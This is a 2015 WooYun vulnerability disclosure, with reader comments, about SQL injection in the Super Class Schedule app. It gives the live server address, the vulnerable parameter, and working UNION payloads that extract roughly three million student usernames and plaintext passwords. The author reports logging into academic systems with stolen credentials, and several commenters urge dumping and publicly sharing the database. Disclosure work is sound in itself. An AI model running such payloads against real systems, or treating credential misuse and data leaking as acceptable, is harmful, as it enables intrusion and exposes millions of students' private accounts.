当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095049

漏洞标题:超级课程表注入泄露3038593学生教务账户信息

相关厂商:super.cn

漏洞作者: Mr .LZH

提交时间:2015-02-01 14:59

修复时间:2015-02-06 15:00

公开时间:2015-02-06 15:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-01: 细节已通知厂商并且等待厂商处理中
2015-02-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

这个漏洞和主业务并没有影响,同时也是你们这个模块工程师犯得低级错误。
于是我想问,和主业务无关就危害不大吗?低级错误就问题不大?
于是乎:请看3038593学生教务账户信息泄露。

详细说明:

之前提交的漏洞: WooYun: 超级课程表注入漏洞导致多个数据库信息泄露
问题已经修复,campus参数做了过滤,存在单引号则执行不通过,其他相关符合做了转义。
但是又出现了新的注入点:dateStar参数。
漏洞地址:http://112.124.56.216:8080/Super/EmptyClassroom/findEmptyClass.action
post数据:campus=test&schoolId=12005&selectType=101&hasPeriod=0&beginYear=2013&term=1&dateStart=注入点&classroomType=test
由于之前提交的漏洞给了3个rank,显然工程师没有意识到危害,于是这一次直接扒数据做展示。

back-end DBMS: MySQL 5.0
available databases [4]:
[*] EmptyClassroom
[*] information_schema
[*] test
[*] test_system


先获取第一条学生教务信息:
post数据:campus=test&schoolId=12005&selectType=101&hasPeriod=0&beginYear=2014&term=1&tableType=3&dateStart=2015-1-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT('result:',(select concat(' school:',schoolName,' username:',studentNumber,' password:',studentPassword) from test_system.privacy limit 0,1)),NULL,NULL,NULL,NULL#&classroomType=test

4.jpg


再看看这里面泄露了多少学生教务信息:3038593条数据,问题真不大?
post数据:campus=test&schoolId=12005&selectType=101&hasPeriod=0&beginYear=2014&term=1&tableType=3&dateStart=2015-1-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT('result:',(select (select count(*) from test_system.privacy))),NULL,NULL,NULL,NULL#&classroomType=test

5.jpg


于是找几条数据登陆一下教务系统:

1.jpg


2.jpg


3.jpg

漏洞证明:

修复方案:

20rank真不多。

版权声明:转载请注明来源 Mr .LZH@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-06 15:00

厂商回复:

漏洞Rank:20 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-02-01 15:03 | 蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有,还谈什么狗屁爱情?)

    于是乎:请看3038593学生教务账户信息泄露。

  2. 2015-02-01 15:05 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    — —。我怎么感觉漏了点什么..

  3. 2015-02-01 15:08 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    @zeracker 你想加点料?

  4. 2015-02-01 15:14 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @Mr .LZH 某ceo不是号称有多少W用户量么

  5. 2015-02-01 15:25 | 牧马 ( 普通白帽子 | Rank:107 漏洞数:17 | 我是要成为猪猪侠的男人。。。。)

    呵呵,中国青年说?某程序员给CEO丢人了...不尊重白帽子,CEO教的?

  6. 2015-02-01 15:25 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    @zeracker 某ceo还说今年要拿2亿给员工呢,这么土豪的公司,想必挖了他们这么多数据,至少也送个iPhone6什么的吧。你去挖挖看,拿到iPhone告诉我。

  7. 2015-02-01 15:34 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    @zeracker 其实拿到的只是部分用户,不是全部。

  8. 2015-02-01 15:54 | popok ( 普通白帽子 | Rank:117 漏洞数:24 | nothing)

    这软件30W的用户差不多了吧

  9. 2015-02-01 15:54 | popok ( 普通白帽子 | Rank:117 漏洞数:24 | nothing)

    @popok 好吧,少打一个0

  10. 2015-02-01 16:09 | 呼呼大侠 ( 路人 | Rank:6 漏洞数:2 | 一只默默学习的菜菜)

    ......................300W

  11. 2015-02-01 16:43 | sin ( 实习白帽子 | Rank:38 漏洞数:2 | 寻找最优雅的解决方案)

    这么说超级课程表还是截获了学生部分信息,甚至学号密码咯...

  12. 2015-02-01 20:13 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    坐等忽略!!

  13. 2015-02-02 09:19 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    某ceo的演讲至今历历在目

  14. 2015-02-02 16:04 | 帅气小狼狗 ( 路人 | Rank:8 漏洞数:2 | 汪汪汪)

    等忽略吧,厂商就这尿性。@super.cn 你来打我呀。

  15. 2015-02-02 21:18 | 小智 ( 实习白帽子 | Rank:33 漏洞数:5 | 低调低调,学习学习~)

    我纯粹来围观~比卡比卡~

  16. 2015-02-05 10:45 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    知乎对余佳文的评价不怎么高

  17. 2015-02-06 15:52 | Lyleaks ( 普通白帽子 | Rank:137 漏洞数:9 | 这个人很聪明,什么也没有留下)

    WTF!!! DZ脱了没?

  18. 2015-02-06 15:58 | 派大星 ( 路人 | 还没有发布任何漏洞 | 什么东西是大大粉粉的?你的朋友派大星...)

    看了一下这厂商,真有点不要脸。。

  19. 2015-02-06 16:02 | 蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有,还谈什么狗屁爱情?)

    有本事你忽略了 别修复啊~醉了……这人品,这公司也干不到多大

  20. 2015-02-06 16:20 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    本人宣布,下次挖到,绝对脱了发出来

  21. 2015-02-06 16:27 | 蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有,还谈什么狗屁爱情?)

    @Mr .LZH 支持

  22. 2015-02-06 16:53 | lightless ( 实习白帽子 | Rank:48 漏洞数:11 | HDUISA成员,被某厂坑了一波,求工作。)

    忽略了。。醉了。。

  23. 2015-02-06 17:02 | hblf ( 路人 | Rank:14 漏洞数:2 | 甲方安全攻城狮一枚)

    这种厂商如果被黑了,真心是自找。

  24. 2015-02-06 17:13 | pw0 ( 路人 | Rank:7 漏洞数:2 | 爱推理,爱计算机,爱社工,爱挖有(wei)...)

    这厂商我也是醉了

  25. 2015-02-07 09:56 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @Mr .LZH 脱吧 zone欢迎你发网盘链接

  26. 2015-02-07 19:44 | cooFool ( 路人 | Rank:0 漏洞数:2 | 终于通过了。)

    下次请不要发出来了。有次我看见他们的所谓CEO发的微博有错字,还想假装是草根获取同情,公关真厉害。又看这态度。呵呵了我就。

  27. 2015-02-16 22:58 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    我操,真忽略了。。。

  28. 2015-02-22 22:00 | mr.yu ( 路人 | Rank:22 漏洞数:12 )

    这种无德厂商,以后漏洞直接脱,没必要发了。。。。

  29. 2015-06-12 12:59 | 命运 ( 路人 | Rank:2 漏洞数:1 | 我是来乌云秀智商下限的~~)

    @Mr .LZH 请问你现在脱了吗~~哈哈 求裤子

  30. 2015-06-14 19:03 | Mr.Trojan ( 路人 | Rank:0 漏洞数:1 | 小白一个)

    @Mr .LZH 大神过了几个月了,这个裤子可以给链接不~去掉详细信息,这种事情居然没有媒体关注,super也没有倒闭,真他妈的

  31. 2015-08-18 23:40 | zsx ( 路人 | Rank:0 漏洞数:3 | undefined)

    知乎观光团卧槽!!!

  32. 2015-08-19 09:13 | mr.yu ( 路人 | Rank:22 漏洞数:12 )

    这厮命不保矣、、、。。

  33. 2015-08-20 10:10 | hblf ( 路人 | Rank:14 漏洞数:2 | 甲方安全攻城狮一枚)

    @zsx 咋知乎观光到这里来了?